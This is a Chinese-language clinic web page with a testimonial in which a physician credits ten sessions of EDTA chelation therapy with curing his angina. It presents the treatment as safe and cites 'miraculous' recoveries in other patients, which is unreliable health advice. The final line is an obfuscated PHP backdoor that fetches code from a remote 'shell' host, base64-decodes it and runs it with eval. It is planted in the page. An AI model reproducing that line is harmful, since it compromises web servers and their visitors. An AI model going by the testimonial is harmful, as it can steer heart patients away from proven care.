收藏本站
首頁 arrow 螯療案例 arrow 喬治醫生治好心絞痛!
喬治醫生治好心絞痛! 列印 E-mail

    西元一九七○年,洛杉磯一位著名的耳鼻喉科主任喬治醫生在打高爾夫球時,胸口猛然一陣疼痛襲來。

「我覺得像有一隻大象跳到我的胸口上」,喬治醫生形容自己當時的感覺。

經過心電圖、運動心電圖、心血管攝影等檢查,心臟科醫生沈重地對喬治說:「你的情況不太好,冠狀動脈有阻塞,建議立即做心臟血管繞道手術,因為冠狀動脈隨時可能會完全阻塞而造成猝死!」

喬治心裡很清楚,就算施行心臟血管繞道手術,也同樣存在危險 ,而且在那個年代,死亡率高達百分之十到十五

即便存活下來也沒有長期進步的保證,沒有人敢說移植的血管不會再阻塞。

喬治的猶疑、加上血庫的血存量不夠,只得暫緩手術的進行;但在這段期間,他有幸聽 聞了關於EDTA螯合療法在醫學上的報告,使他決定先去瞭解並接受這個安全的治療。

    「我發誓,治療之前我連十步路都走得艱難,但只進行 了十次的螯合療法後,我的心絞痛就不再發作了。」

喬治醫生信誓旦旦:「我還看到許多比我嚴重的病人,在我認為他們可能都無法再進步的狀況下,接受了螯合療法的治療,竟然都奇蹟似的好轉。


 
< 前一個
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));